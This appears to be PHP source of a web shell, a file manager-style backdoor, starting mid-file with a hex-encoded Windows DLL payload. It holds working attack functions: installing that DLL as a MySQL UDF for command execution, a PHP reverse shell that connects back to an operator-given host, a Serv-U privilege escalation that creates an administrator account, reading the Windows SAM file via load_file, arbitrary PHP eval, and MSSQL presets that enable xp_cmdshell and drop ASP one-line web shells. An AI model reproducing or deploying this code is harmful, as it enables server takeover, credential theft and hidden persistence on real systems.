5EB8407C4600C542FB998A170B6DA75D3F812DCDD3302524964386C7353F3B3378BDD5575650C4F09DE4BD2258C531D2D471A086D618643427552C93B2463366412A0D50CC363141E4D6F64BDA34E616D6A3B2160BC5F9EE473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
}
function Mysql_m()
{
    extract($_POST);
    extract($_GET);
    $mysql_hostname = $mysql_hostname ? $mysql_hostname : "127.0.0.1";
    $mysql_username = $mysql_username ? $mysql_username : "root";
    $post_sql = $post_sql ? $post_sql : "select state(\"net user\")";
    $mysql_dbname = $mysql_dbname ? $mysql_dbname : "mysql";
    if ($install) {
        $link = mysql_connect($mysql_hostname, $mysql_username, $mysql_passwd) or die(mysql_error());
        mysql_select_db($mysql_dbname, $link) or die(mysql_error());
        @mysql_query("DROP TABLE udf_temp", $link);
        $query = "CREATE TABLE udf_temp (udf BLOB);";
        if (!($result = mysql_query($query, $link))) {
            die('error:create temp table udf_temp error.' . mysql_error());
        } else {
            $code = get_code();
            $query = "INSERT into udf_temp values (CONVERT({$code},CHAR));";
            if (!mysql_query($query, $link)) {
                mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
                die('error:insert DLL error.' . mysql_error());
            } else {
                $dllname = "mysqlDll.dll";
                if (file_exists("c:\\windows\\system32\\")) {
                    $dir = "c:\\\\windows\\\\system32\\\\mysqlDll.dll";
                } elseif (file_exists("c:\\winnt\\system32\\")) {
                    $dir = "c:\\\\winnt\\\\system32\\\\mysqlDll.dll";
                }
                if (file_exists($dir)) {
                    $time = time();
                    $dir = str_replace("mysqlDll", "mysqlDll_{$time}", $dir);
                    $dllname = str_replace("mysqlDll", "mysqlDll_{$time}", $dllname);
                }
                $query = "SELECT udf FROM udf_temp INTO DUMPFILE '" . $dir . "';";
                if (!mysql_query($query, $link)) {
                    die("export dll error:maybe dll is no priv or {$dir} is exists" . mysql_error());
                } else {
                    echo '<font style=font:11pt color=ff0000>install dll success' . $dir . '</font><br>';
                }
            }
            mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
            $result = mysql_query("Create Function state returns string soname '{$dllname}'", $link) or die(mysql_error());
            if ($result) {
                echo "install success <br><a href='?'>back</a>";
                exit;
            }
        }
    }
    ?>
<form method="post" action="?s=m"><br><br>  
<div class="actall">Host: <input name="mysql_hostname" value="<?php 
    echo $mysql_hostname;
    ?>" type="text"  style="width:100px" >
User: <input name="mysql_username" value="<?php 
    echo $mysql_username;
    ?>" type="text"  style="width:70px">
Password: <input type="password" name="mysql_passwd" value="<?php 
    echo $mysql_passwd;
    ?>" style="width:70px">
DB: <input name="mysql_dbname" value="<?php 
    echo $mysql_dbname;
    ?>" type="text" style="width:70px">
&nbsp;&nbsp;<input class="bt" name="install" type="submit" value="install">
 <br>
<br>
sql statement:<br>
 <textarea name="post_sql" cols="80" rows="10"><?php 
    echo stripslashes($post_sql);
    ?>
</textarea>
          <br>  <br>
          <input class="bt" name="" type="submit" value="execute">
        </form><br>back screen:</div>
<?php 
    if ($_POST[post_sql]) {
        $link = mysql_connect($mysql_hostname, $mysql_username, $mysql_passwd) or die(mysql_error());
        if ($mysql_dbname) {
            mysql_select_db($mysql_dbname, $link) or die(mysql_error());
        }
        $query = stripslashes($post_sql);
        $result = mysql_query($query, $link) or die(mysql_error());
        ?>
<br>
<textarea name="post_sql" style="width:610px;height:180px;">
<?php 
        echo $result ? "Done:{$result}\n\n" : "error:{$result}\n\n " . mysql_error();
        while ($row = @mysql_fetch_array($result)) {
            print_r($row);
        }
    }
    ?>    
</textarea>
<?php 
}
//win back connect - php socket
function phpsocket()
{
    @set_time_limit(0);
    $system = "PHP";
    if (!extension_loaded('sockets')) {
        if (false) {
            @dl('php_sockets.dll') or die("Can't load socket");
        } else {
            @dl('sockets.so') or die("Can't load socket");
        }
    }
    if (isset($_POST['host']) && isset($_POST['port'])) {
        $host = $_POST['host'];
        $port = $_POST['port'];
    } else {
        print "<html>\n<br><br>\n<body>\n<div class=\"actall\"><h5>reverse cmdshell with php socket;<br>the extension php_sockets should be openned;<br>please check phpinfo();<br>code by <a href=http://www.Wolvez.org><font color=#FF67A0>Maple-X</font></a><br></h5><br></div>\n<form method=post action=\"?s=r\">\n<div class=\"actall\"><br>Host:<input type=text name=host value=\"\">&nbsp&nbsp\nPort:<input type=text name=port value=\"1120\">&nbsp&nbsp<br><br>\n<input type=\"radio\" name=info value=\"linux\" checked>Linux\n<input type=\"radio\" name=info value=\"win\">Win &nbsp\n<input class=\"bt\" type=submit name=submit value=\"connect\">\n</form>\n</body>\n</html>";
        echo "<br><br>";
    }
    if ($system == "WIN") {
        $env = array('path' => 'c:\\windows\\system32');
    } else {
        $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
    }
    $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
    $host = gethostbyname($host);
    $proto = getprotobyname("tcp");
    if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) {
        die("Socket Create Faile");
    }
    if (($ret = socket_connect($sock, $host, $port)) < 0) {
        die("Connect Faile");
    } else {
        $message = "----------------------PHP Connect-Back--------------------\n";
        socket_write($sock, $message, strlen($message));
        $cwd = "/var/www/html";
        while ($cmd = socket_read($sock, 65535, $proto)) {
            if (trim(strtolower($cmd)) == "exit") {
                socket_write($sock, "Bye Bye\n");
                exit;
            } else {
                $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
                if (is_resource($process)) {
                    fwrite($pipes[0], $cmd);
                    fclose($pipes[0]);
                    $msg = stream_get_contents($pipes[1]);
                    socket_write($sock, $msg, strlen($msg));
                    fclose($pipes[1]);
                    $msg = stream_get_contents($pipes[2]);
                    socket_write($sock, $msg, strlen($msg));
                    $return_value = proc_close($process);
                }
            }
        }
    }
}
//serv-u
function su()
{
    $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
    print <<<END
<div class="actall"><a href="?s=z">[Exec Command]</a> <a href="?s=z&o=adduser">[Add User]</a></div>
<form method="POST">
\t<div class="actall">SU_Port <input name="SUPort" type="text" value="43958" style="width:300px"></div>
\t<div class="actall">SU_User <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
\t<div class="actall">SU_Pass <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
END;
    if ($_GET['o'] == 'adduser') {
        print "<div class=\"actall\">Username <input name=\"user\" type=\"text\" value=\"spider\" style=\"width:100px\">\nPassword <input name=\"password\" type=\"text\" value=\"spider\" style=\"width:100px\">\nDirectory <input name=\"part\" type=\"text\" value=\"C:\\\\\" style=\"width:150px\"></div>";
    } else {
        print "<div class=\"actall\">Command <input name=\"SUCommand\" type=\"text\" value=\"net user b4che10r 123456 /add & net localgroup administrators b4che10r /add\" style=\"width:600px\"><br>\n<input name=\"user\" type=\"hidden\" value=\"b4che10r\">\n<input name=\"password\" type=\"hidden\" value=\"123456\">\n<input name=\"part\" type=\"hidden\" value=\"C:\\\\\"></div>";
    }
    echo "<div class=\"actall\"><input class=\"bt\" type=\"submit\" value=\"Exec\" style=\"width:80px;\"></div></form>";
    if (!empty($_POST['SUPort']) && !empty($_POST['SUUser']) && !empty($_POST['SUPass'])) {
        echo "<div class=\"actall\">";
        $sendbuf = "";
        $recvbuf = "";
        $domain = "-SETDOMAIN\r\n-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
        $adduser = "-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=21\r\n-User=" . $_POST['user'] . "\r\n" . "-Password=" . $_POST['password'] . "\r\n" . "-HomeDir=c:\\\r\n" . "-LoginMesFile=\r\n" . "-Disable=0\r\n" . "-RelPaths=1\r\n" . "-NeedSecure=0\r\n" . "-HideHidden=0\r\n" . "-AlwaysAllowLogin=0\r\n" . "-ChangePassword=0\r\n" . "-QuotaEnable=0\r\n" . "-MaxUsersLoginPerIP=-1\r\n" . "-SpeedLimitUp=0\r\n" . "-SpeedLimitDown=0\r\n" . "-MaxNrUsers=-1\r\n" . "-IdleTimeOut=600\r\n" . "-SessionTimeOut=-1\r\n" . "-Expire=0\r\n" . "-RatioUp=1\r\n" . "-RatioDown=1\r\n" . "-RatiosCredit=0\r\n" . "-QuotaCurrent=0\r\n" . "-QuotaMaximum=0\r\n" . "-Maintenance=None\r\n" . "-PasswordType=Regular\r\n" . "-Ratios=None\r\n" . " Access=" . $_POST['part'] . "\\|RWAMELCDP\r\n";
        $deldomain = "-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=21\r\n";
        $sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);
        $recvbuf = @fgets($sock, 1024);
        echo "Data receive: {$recvbuf} <br>";
        $sendbuf = "USER " . $_POST["SUUser"] . "\r\n";
        @fputs($sock, $sendbuf, strlen($sendbuf));
        echo "Data send: {$sendbuf} <br>";
        $recvbuf = @fgets($sock, 1024);
        echo "Data receive: {$recvbuf} <br>";
        $sendbuf = "PASS " . $_POST["SUPass"] . "\r\n";
        @fputs($sock, $sendbuf, strlen($sendbuf));
        echo "Data send: {$sendbuf} <br>";
        $recvbuf = @fgets($sock, 1024);
        echo "Data receive: {$recvbuf} <br>";
        $sendbuf = "SITE MAINTENANCE\r\n";
        @fputs($sock, $sendbuf, strlen($sendbuf));
        echo "Data send: SITE MAINTENANCE\r\n <br>";
        $recvbuf = @fgets($sock, 1024);
        echo "Data receive: {$recvbuf} <br>";
        $sendbuf = $domain;
        @fputs($sock, $sendbuf, strlen($sendbuf));
        echo "Data send: -SETDOMAIN\r\n-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n <br>";
        $recvbuf = @fgets($sock, 1024);
        echo "Data receive: {$recvbuf} <br>";
        $sendbuf = $adduser;
        @fputs($sock, $sendbuf, strlen($sendbuf));
        echo "Data send: {$sendbuf} <br>";
        $recvbuf = @fgets($sock, 1024);
        echo "Data receive: {$recvbuf} <br>";
        if (!empty($_POST['SUCommand'])) {
            $exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10);
            $recvbuf = @fgets($exp, 1024);
            echo "Data receive: {$recvbuf} <br>";
            $sendbuf = "USER " . $_POST['user'] . "\r\n";
            @fputs($exp, $sendbuf, strlen($sendbuf));
            echo "Data send: {$sendbuf} <br>";
            $recvbuf = @fgets($exp, 1024);
            echo "Data receive: {$recvbuf} <br>";
            $sendbuf = "PASS " . $_POST['password'] . "\r\n";
            @fputs($exp, $sendbuf, strlen($sendbuf));
            echo "Data send: {$sendbuf} <br>";
            $recvbuf = @fgets($exp, 1024);
            echo "Data receive: {$recvbuf} <br>";
            $sendbuf = "site exec " . $_POST["SUCommand"] . "\r\n";
            @fputs($exp, $sendbuf, strlen($sendbuf));
            echo "Data send: site exec <font color=#006600>" . $_POST["SUCommand"] . "</font> <br>";
            $recvbuf = @fgets($exp, 1024);
            echo "Data receive: {$recvbuf} <br>";
            $sendbuf = $deldomain;
            @fputs($sock, $sendbuf, strlen($sendbuf));
            echo "Data send: -DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=21\r\n <br>";
            $recvbuf = @fgets($sock, 1024);
            echo "Data receive: {$recvbuf} <br>";
            @fclose($exp);
        }
        @fclose($sock);
        echo "</div>";
    }
}
//mysql statement
function Mysql_n()
{
    $MSG_BOX = ' ';
    $mhost = 'localhost';
    $muser = 'root';
    $mport = '3306';
    $mpass = '';
    $mdata = 'mysql';
    $msql = 'select version();';
    if (isset($_POST['mhost']) && isset($_POST['muser'])) {
        $mhost = $_POST['mhost'];
        $muser = $_POST['muser'];
        $mpass = $_POST['mpass'];
        $mdata = $_POST['mdata'];
        $mport = $_POST['mport'];
        if ($conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass)) {
            @mysql_select_db($mdata);
        } else {
            $MSG_BOX = 'Connect to mysql faild ';
        }
    }
    $downfile = 'c:/windows/repair/sam';
    if (!empty($_POST['downfile'])) {
        $downfile = File_Str($_POST['downfile']);
        $binpath = bin2hex($downfile);
        $query = 'select load_file(0x' . $binpath . ')';
        if ($result = @mysql_query($query, $conn)) {
            $k = 0;
            $downcode = '';
            while ($row = @mysql_fetch_array($result)) {
                $downcode .= $row[$k];
                $k++;
            }
            $filedown = basename($downfile);
            if (!$filedown) {
                $filedown = 'b4che10r.tmp';
            }
            $array = explode('.', $filedown);
            $arrayend = array_pop($array);
            header('Content-type: application/x-' . $arrayend);
            header('Content-Disposition: attachment; filename=' . $filedown);
            header('Content-Length: ' . strlen($downcode));
            echo $downcode;
            exit;
        } else {
            $MSG_BOX = 'Download file faild';
        }
    }
    $o = isset($_GET['o']) ? $_GET['o'] : '';
    Root_CSS();
    print <<<END
<form method="POST" name="nform" id="nform" action="?s=n&o={$o}" enctype="multipart/form-data">
<center><div class="actall"><a href="?s=n">[execute Mysql statement]</a> 
<a href="?s=n&o=u">[Mysql upfile]</a> 
<a href="?s=n&o=d">[Mysql download file]</a></div>
<div class="actall">
IP: <input type="text" name="mhost" value="{$mhost}" style="width:110px">
Port: <input type="text" name="mport" value="{$mport}" style="width:110px">
User: <input type="text" name="muser" value="{$muser}" style="width:110px">
Pass: <input type="text" name="mpass" value="{$mpass}" style="width:110px">
Dbname: <input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div>
<div class="actall" style="height:220px;">
END;
    if ($o == 'u') {
        $uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/��/exp.vbs';
        if (!empty($_POST['uppath'])) {
            $uppath = $_POST['uppath'];
            $query = 'Create TABLE a (cmd text NOT NULL);';
            if (@mysql_query($query, $conn)) {
                if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) {
                    $filecode = bin2hex(File_Read($tmpcode));
                } else {
                    $tmp = File_Str("/var/www/html") . '/upfile.tmp';
                    if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) {
                        $filecode = bin2hex(File_Read($tmp));
                        @unlink($tmp);
                    }
                }
                $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x' . $filecode . ',CHAR));';
                if (@mysql_query($query, $conn)) {
                    $query = 'SELECT cmd FROM a INTO DUMPFILE \'' . $uppath . '\';';
                    $MSG_BOX = @mysql_query($query, $conn) ? 'upfile success' : 'upfile faild';
                } else {
                    $MSG_BOX = 'insert into temp table faild';
                }
                @mysql_query('Drop TABLE IF EXISTS a;', $conn);
            } else {
                $MSG_BOX = 'create temp table faild';
            }
        }
        print <<<END
<br><br>Path: <input type="text" name="uppath" value="{$uppath}" style="width:500px">
<br><br>File:&nbsp <input type="file" name="upfile" style="width:500px;height:22px;">
</div><div class="actall"><input class="bt" type="submit" value="upfile">
END;
    } elseif ($o == 'd') {
        print <<<END
<br><br><br>download file: <input type="text" name="downfile" value="{$downfile}" style="width:500px">
</div><div class="actall"><input class="bt" type="submit" value="Download">
END;
    } else {
        print <<<END
<script language="javascript">
function nFull(i){
\tStr = new Array(15);
        Str[0] = "select command  Or input manual";
\tStr[1] = "select version();";
        Str[2] = "select @@character_set_database;";
        Str[3] = "show databases;";
        Str[4] = "show tables;";
        Str[5] = "show columns from table_name;";
        Str[6] = "select @@hostname;";
        Str[7] = "select @@version_compile_os;";
        Str[8] = "select @@basedir;";
        Str[9] = "select @@datadir;";
        Str[10] = "describe table_name;";
        Str[11] = "select User,Password from mysql.user;";
\tStr[12] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);";
\tStr[13] = "select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;";
\tStr[14] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
\tnform.msql.value = Str[i];
\treturn true;
}
</script>
<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
<div class="actall">
<select onchange="return nFull(options[selectedIndex].value)">
        <option value="0" selected>command</option>
\t<option value="1">version</option>
        <option value="2">charset</option>
        <option value="3">databases</option>
        <option value="4">tables</option>
        <option value="5">columns</option>
        <option value="6">hostname</option>
        <option value="7">version_compile_os</option>
        <option value="8">basedir</option>
        <option value="9">datadir</option>
        <option value="10">describe</option>
        <option value="11">hashes</option>
\t<option value="12">load_file</option>
\t<option value="13">into dumpfile</option>
\t<option value="14">skip_network</option>
</select>
<input class="bt" type="submit" value="execute">
END;
        if (!empty($_POST['msql'])) {
            $msql = $_POST['msql'];
            if ($result = @mysql_query($msql, $conn)) {
                $MSG_BOX = 'execute sql statement success<br>';
                $row = mysql_fetch_row($result);
                echo "<table border=\"1\" cellpadding=\"1\" cellspacing=\"2\"><tr>";
                for ($i = 0; $i < mysql_num_fields($result); $i++) {
                    echo '<td><b>' . mysql_field_name($result, $i) . "</b></td>";
                }
                echo "</tr>";
                mysql_data_seek($result, 0);
                while ($row = mysql_fetch_row($result)) {
                    echo "<tr>";
                    for ($i = 0; $i < mysql_num_fields($result); $i++) {
                        echo '<td>' . "{$row[$i]}" . '</td>';
                    }
                    echo "</tr>";
                }
                echo "</table>";
                mysql_free_result($result);
            } else {
                $MSG_BOX .= mysql_error();
            }
        }
    }
    echo '<br>' . $MSG_BOX . '</div></center></form>';
    return true;
}
//eval php code
function phpcode()
{
    print "<html>\n<br />\n<div class=\"actall\"><h5>user define php code:<h5><br></div>\n<form action=\"?s=x\" method=\"POST\">\n<div class=\"actall\"><textarea name=\"phpcode\" rows=\"20\" cols=\"80\">print_r(apache_get_modules());/*get apache modules which have openned*/</textarea></div><br />\n<div><input class=\"bt\" type=\"submit\" value=\"EVAL\"></div></form>\n</html>";
    $phpcode = $_POST['phpcode'];
    $phpcode = trim($phpcode);
    if ($phpcode) {
        if (!preg_match('#<\\?#si', $phpcode)) {
            $phpcode = "<?php\n\n{$phpcode}\n\n?>";
        }
        eval("?" . ">{$phpcode}<?php ");
        echo "<br><br>";
    }
    return false;
}
//other db connector
function otherdb()
{
    $db = isset($_GET['db']) ? $_GET['db'] : '';
    print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=w&db={$db}" enctype="multipart/form-data">
<div class="actall"><a href="?s=w"> &nbsp psotgresql &nbsp</a> 
<a href="?s=w&db=ms"> &nbsp mssql &nbsp</a> 
<a href="?s=w&db=ora"> &nbsp oracle &nbsp</a>
<a href="?s=w&db=ifx"> &nbsp informix &nbsp</a>
<a href="?s=w&db=fb"> &nbsp  firebird &nbsp</a>
<a href="?s=w&db=db2">&nbsp db2 &nbsp</a></div></form>
END;
    if ($db == "ms") {
        $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
        $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa';
        $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : 'sa123';
        $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
        $msaction = isset($_POST['action']) ? $_POST['action'] : '';
        $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
        $msquery = stripslashes($msquery);
        print <<<END
<form method="POST" name="msform" action="?s=w&db=ms">
<div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
        Str[0] = "";
\tStr[1] = "select @@version;";
        Str[2] = "select name from sysdatabases;";
        Str[3] = "select name from sysobject where type='U';";
        Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
        Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
        Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
        Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
        Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
        Str[11] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
        msform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">add sp_oacreate</option>
\t<option value="6">add xp_cmdshell</option>
\t<option value="7">add xp_cmdshell(2005)</option>
        <option value="8">add sp_oacreate(2005)</option>
        <option value="9">open openrowset(2005)</option>
        <option value="10">xp_cmdshell exec</option>
        <option value="10">sp_oamethod exec</option>
        <option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($msaction == 'msquery') {
            $msconn = mssql_connect($mshost, $msuser, $mspass);
            mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
            $msresult = mssql_query($msquery) or die(mssql_get_last_message());
            echo "<font face=\"verdana\">";
            echo "<table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">";
            echo "\n<tr>\n";
            for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . mssql_field_name($msresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            mssql_data_seek($result, 0);
            while ($msrow = mssql_fetch_row($msresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                    echo "<td bgcolor=\"#B8B8E8\">";
                    echo "{$msrow[$i]}";
                    echo "</td>";
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            mssql_free_result($msresult);
            mssql_close();
        }
    } elseif ($db == "ora") {
        $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
        $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
        $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root';
        $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456';
        $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
        $oraaction = isset($_POST['action']) ? $_POST['action'] : '';
        $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
        $oraquery = stripslashes($oraquery);
        print <<<END
<form method="POST" name="oraform" action="?s=w&db=ora">
<div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br>
<script language="javascript">
function oraFull(i){
\tStr = new Array(8);
        Str[0] = ""; 
\tStr[1] = "select version();";
        Str[2] = "show databases;";
        Str[3] = "show tables from db_name;";
        Str[4] = "show columns from table_name;";
        Str[5] = "select user,password from mysql.user;";
\tStr[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);";
\tStr[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">hashes</option>
\t<option value="6">load_file</option>
\t<option value="7">into outfile</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($oraaction == 'oraquery') {
            $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
            $oraresult = ociparse($oralink, $oraquery) or die(ocierror());
            $orarow = oci_fetch_row($oraresult);
            echo "<font face=\"verdana\">";
            echo "<table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">";
            echo "\n<tr>\n";
            for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . oci_field_name($oraresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            ociresult($oraresult, 0);
            while ($orarow = ora_fetch_row($oraresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ora_num_fields($result); $i++) {
                    echo "<td bgcolor=\"#B8B8E8\">";
                    echo "{$orarow[$i]}";
                    echo "</td>";
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
